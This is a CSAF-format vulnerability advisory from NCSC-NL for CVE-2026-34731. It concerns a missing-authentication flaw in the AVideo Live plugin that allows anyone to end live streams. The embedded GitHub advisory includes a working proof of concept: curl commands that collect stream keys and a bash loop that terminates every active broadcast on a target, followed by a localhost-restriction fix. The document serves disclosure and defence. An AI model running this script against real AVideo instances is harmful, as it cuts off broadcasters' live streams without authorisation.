{
    "document": {
        "category": "csaf_base",
        "csaf_version": "2.0",
        "distribution": {
            "tlp": {
                "label": "WHITE"
            }
        },
        "lang": "en",
        "notes": [
            {
                "category": "legal_disclaimer",
                "text": "The Netherlands Cyber Security Center (henceforth: NCSC-NL) maintains this portal to enhance access to its information and vulnerabilities. The use of this information is subject to the following terms and conditions:\n\nThe vulnerabilities disclosed in this portal are gathered by NCSC-NL from a variety of open sources, which the user can retrieve from other platforms. NCSC-NL makes every reasonable effort to ensure that the content of this portal is kept up to date, and that it is accurate and complete. Nevertheless, NCSC-NL cannot entirely rule out the possibility of errors, and therefore cannot give any warranty in respect of its completeness, accuracy or real-time keeping up-to-date. NCSC-NL does not control nor guarantee the accuracy, relevance, timeliness or completeness of information obtained from these external sources. The vulnerabilities disclosed in this portal are intended solely for the convenience of professional parties to take appropriate measures to manage the risks posed to the cybersecurity. No rights can be derived from the information provided therein.\n\nNCSC-NL and the Kingdom of the Netherlands assume no legal liability or responsibility for any damage resulting from either the use or inability of use of the vulnerabilities disclosed in this portal. This includes damage resulting from the inaccuracy or incompleteness of the information contained in it.\nThe information on this page is subject to Dutch law. All disputes related to or arising from the use of this portal regarding the disclosure of vulnerabilities will be submitted to the competent court in The Hague. This choice of means also applies to the court in summary proceedings."
            }
        ],
        "publisher": {
            "category": "coordinator",
            "contact_details": "cert@ncsc.nl",
            "name": "National Cyber Security Centre",
            "namespace": "https://www.ncsc.nl/"
        },
        "title": "CVE-2026-34731",
        "tracking": {
            "current_release_date": "2026-04-01T23:19:27.840584Z",
            "generator": {
                "date": "2026-02-17T15:00:00Z",
                "engine": {
                    "name": "V.E.L.M.A",
                    "version": "1.7"
                }
            },
            "id": "CVE-2026-34731",
            "initial_release_date": "2026-03-31T21:26:31.322402Z",
            "revision_history": [
                {
                    "date": "2026-03-31T21:26:31.322402Z",
                    "number": "1",
                    "summary": "CVE created.| Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| References created (1).| CWES updated (1)."
                },
                {
                    "date": "2026-03-31T21:26:33.309523Z",
                    "number": "2",
                    "summary": "NCSC Score created."
                },
                {
                    "date": "2026-03-31T21:39:06.912498Z",
                    "number": "3",
                    "summary": "Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| Products connected (1).| References created (1).| CWES updated (1)."
                },
                {
                    "date": "2026-03-31T21:39:08.789931Z",
                    "number": "4",
                    "summary": "NCSC Score updated."
                },
                {
                    "date": "2026-04-01T15:06:21.150359Z",
                    "number": "5",
                    "summary": "Source connected.| CVE status created. (valid)| EPSS created."
                },
                {
                    "date": "2026-04-01T15:08:07.199404Z",
                    "number": "6",
                    "summary": "NCSC Score updated."
                },
                {
                    "date": "2026-04-01T22:11:15.370647Z",
                    "number": "7",
                    "summary": "Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| References created (4).| CWES updated (1)."
                },
                {
                    "date": "2026-04-01T22:11:18.520495Z",
                    "number": "8",
                    "summary": "NCSC Score updated."
                },
                {
                    "date": "2026-04-01T23:00:49.625929Z",
                    "number": "9",
                    "summary": "Products connected (1).| Product Identifiers created (1).| Exploits created (1)."
                },
                {
                    "date": "2026-04-01T23:00:52.019629Z",
                    "number": "10",
                    "summary": "NCSC Score updated."
                }
            ],
            "status": "interim",
            "version": "10"
        }
    },
    "product_tree": {
        "branches": [
            {
                "branches": [
                    {
                        "branches": [
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/<=26.0",
                                "product": {
                                    "name": "vers:unknown/<=26.0",
                                    "product_id": "CSAFPID-5893889",
                                    "product_identification_helper": {
                                        "cpe": "cpe:2.3:a:wwbn:avideo:*:*:*:*:*:*:*:*"
                                    }
                                }
                            }
                        ],
                        "category": "product_name",
                        "name": "AVideo"
                    }
                ],
                "category": "vendor",
                "name": "WWBN"
            }
        ]
    },
    "vulnerabilities": [
        {
            "cve": "CVE-2026-34731",
            "cwe": {
                "id": "CWE-306",
                "name": "Missing Authentication for Critical Function"
            },
            "notes": [
                {
                    "category": "description",
                    "text": "WWBN AVideo is an open source video platform. In versions 26.0 and prior, the AVideo on_publish_done.php endpoint in the Live plugin allows unauthenticated users to terminate any active live stream. The endpoint processes RTMP callback events to mark streams as finished in the database, but performs no authentication or authorization checks before doing so. An attacker can enumerate active stream keys from the unauthenticated stats.json.php endpoint, then send crafted POST requests to on_publish_done.php to terminate any live broadcast. This enables denial-of-service against all live streaming functionality on the platform. At time of publication, there are no publicly available patches.",
                    "title": "nvd - https://services.nvd.nist.gov/rest/json/cves/2.0?cveId=CVE-2026-34731"
                },
                {
                    "category": "description",
                    "text": "WWBN AVideo is an open source video platform. In versions 26.0 and prior, the AVideo on_publish_done.php endpoint in the Live plugin allows unauthenticated users to terminate any active live stream. The endpoint processes RTMP callback events to mark streams as finished in the database, but performs no authentication or authorization checks before doing so. An attacker can enumerate active stream keys from the unauthenticated stats.json.php endpoint, then send crafted POST requests to on_publish_done.php to terminate any live broadcast. This enables denial-of-service against all live streaming functionality on the platform. At time of publication, there are no publicly available patches.",
                    "title": "cveprojectv5 - https://raw.githubusercontent.com/CVEProject/cvelistV5/main/cves/2026/34xxx/CVE-2026-34731.json"
                },
                {
                    "category": "description",
                    "text": "## Summary\n\nThe AVideo `on_publish_done.php` endpoint in the Live plugin allows unauthenticated users to terminate any active live stream. The endpoint processes RTMP callback events to mark streams as finished in the database, but performs no authentication or authorization checks before doing so.\n\nAn attacker can enumerate active stream keys from the unauthenticated `stats.json.php` endpoint, then send crafted POST requests to `on_publish_done.php` to terminate any live broadcast. This enables denial-of-service against all live streaming functionality on the platform.\n\n## Details\n\nThe file `plugin/Live/on_publish_done.php` processes RTMP server callbacks when a stream ends. It accepts a POST parameter `name` (the stream key) and directly uses it to look up and terminate the corresponding stream session.\n\n```php\n// plugin/Live/on_publish_done.php\n$row = LiveTransmitionHistory::getLatest($_POST['name'], $live_servers_id, 10);\n$insert_row = LiveTransmitionHistory::finishFromTransmitionHistoryId($row['id']);\n```\n\nThere is no authentication check anywhere in the file - no `User::isLogged()`, no `User::isAdmin()`, no token validation. The endpoint is designed to be called by the RTMP server (e.g., Nginx-RTMP), but since it is a standard HTTP endpoint, any external client can call it directly.\n\nAdditionally, stream keys can be harvested from the unauthenticated `stats.json.php` endpoint, which returns information about active streams including their keys.\n\n## Proof of Concept\n\n1. Retrieve active stream keys from the unauthenticated stats endpoint:\n\n```bash\ncurl -s \"https://your-avideo-instance.com/plugin/Live/stats.json.php\" | python3 -m json.tool\n```\n\n2. Terminate a live stream by sending a POST request with the stream key:\n\n```bash\ncurl -X POST \"https://your-avideo-instance.com/plugin/Live/on_publish_done.php\" \\\n  -d \"name=STREAM_KEY_HERE\"\n```\n\n3. The server responds with HTTP 200 and the stream is marked as finished in the `live_transmitions_history` table. The streamer's broadcast is terminated.\n\n4. To disrupt all active streams, iterate over keys returned from step 1:\n\n```bash\n#!/bin/bash\n# Terminate all active streams on a target AVideo instance\nTARGET=\"https://your-avideo-instance.com\"\n\ncurl -s \"$TARGET/plugin/Live/stats.json.php\" \\\n  | python3 -c \"\nimport sys, json\ndata = json.load(sys.stdin)\nfor stream in data.get('applications', []):\n    for client in stream.get('live', {}).get('streams', []):\n        print(client.get('name', ''))\n\" | while read -r key; do\n  [ -z \"$key\" ] && continue\n  echo \"[*] Terminating stream: $key\"\n  curl -s -X POST \"$TARGET/plugin/Live/on_publish_done.php\" -d \"name=$key\"\ndone\n```\n\n## Impact\n\nAny unauthenticated attacker can terminate live broadcasts on an AVideo instance. This constitutes a denial-of-service vulnerability against the live streaming functionality. Combined with the unauthenticated stream key enumeration from `stats.json.php`, an attacker can systematically disrupt all active streams on the platform.\n\n- **CWE-306**: Missing Authentication for Critical Function\n- **Severity**: Medium\n\n## Recommended Fix\n\nRestrict the RTMP callback endpoint to localhost connections only at `plugin/Live/on_publish_done.php:3`:\n\n```php\n// plugin/Live/on_publish_done.php:3\nif (!in_array($_SERVER['REMOTE_ADDR'], ['127.0.0.1', '::1'])) {\n    http_response_code(403);\n    die('Forbidden');\n}\n```\n\nSince this endpoint is designed to be called by the local RTMP server (e.g., Nginx-RTMP), it should only accept requests from localhost. External clients should never be able to invoke it directly.\n\n---\n*Found by [aisafe.io](https://aisafe.io)*",
                    "title": "github - https://api.github.com/advisories/GHSA-4jcg-jxpf-5vq3"
                },
                {
                    "category": "other",
                    "text": "0.00064",
                    "title": "EPSS"
                },
                {
                    "category": "other",
                    "text": "3.7",
                    "title": "NCSC Score"
                },
                {
                    "category": "other",
                    "text": "Is related to (a version of) an uncommon product, There is exploit data available from source Nvd, The value of the most recent EPSS score, Exploit code publicly available",
                    "title": "NCSC Score top decreasing factors"
                }
            ],
            "product_status": {
                "known_affected": [
                    "CSAFPID-5893889"
                ]
            },
            "references": [
                {
                    "category": "external",
                    "summary": "Source - nvd",
                    "url": "https://services.nvd.nist.gov/rest/json/cves/2.0?cveId=CVE-2026-34731"
                },
                {
                    "category": "external",
                    "summary": "Source - cveprojectv5",
                    "url": "https://raw.githubusercontent.com/CVEProject/cvelistV5/main/cves/2026/34xxx/CVE-2026-34731.json"
                },
                {
                    "category": "external",
                    "summary": "Source - first",
                    "url": "https://api.first.org/data/v1/epss?limit=10000&offset=0"
                },
                {
                    "category": "external",
                    "summary": "Source - github",
                    "url": "https://api.github.com/advisories/GHSA-4jcg-jxpf-5vq3"
                },
                {
                    "category": "external",
                    "summary": "Reference - cveprojectv5; github; nvd",
                    "url": "https://github.com/WWBN/AVideo/security/advisories/GHSA-4jcg-jxpf-5vq3"
                },
                {
                    "category": "external",
                    "summary": "Reference - github",
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-34731"
                },
                {
                    "category": "external",
                    "summary": "Reference - github",
                    "url": "https://github.com/WWBN/AVideo/commit/e0b9e71f6f3b34f12ad78c1a69d4e1f584b49673"
                },
                {
                    "category": "external",
                    "summary": "Reference - github",
                    "url": "https://github.com/advisories/GHSA-4jcg-jxpf-5vq3"
                }
            ],
            "scores": [
                {
                    "cvss_v3": {
                        "version": "3.1",
                        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
                        "baseScore": 7.5,
                        "baseSeverity": "HIGH"
                    },
                    "products": [
                        "CSAFPID-5893889"
                    ]
                }
            ],
            "title": "CVE-2026-34731"
        }
    ]
}